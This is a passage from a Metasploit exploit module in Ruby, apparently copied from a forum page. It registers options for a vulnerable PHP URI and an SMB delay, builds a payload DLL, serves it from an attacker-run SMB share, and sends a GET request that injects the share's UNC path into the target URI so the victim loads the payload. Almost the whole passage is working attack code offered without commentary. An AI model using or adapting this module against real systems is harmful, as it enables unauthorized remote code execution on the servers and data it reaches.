[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, # Default target is 32-bit as we usually inject into 32bit processes 'DisclosureDate' => 'Mar 04 2015' )) register_options( [ OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']), OptString.new('TARGETURI', [true, 'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]) ], self.class) deregister_options('FILE_CONTENTS') end def setup super self.file_contents = generate_payload_dll self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" print_status("File available on #{unc}...") end def primer sploit = target_uri.to_s sploit << unc print_status("#{peer} - Trying to ") send_request_raw({ 'method' => 'GET', 'uri' => sploit }, 3) end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # do nothing... just finish exploit and stop smb server... end end end
×
×
  • Create New...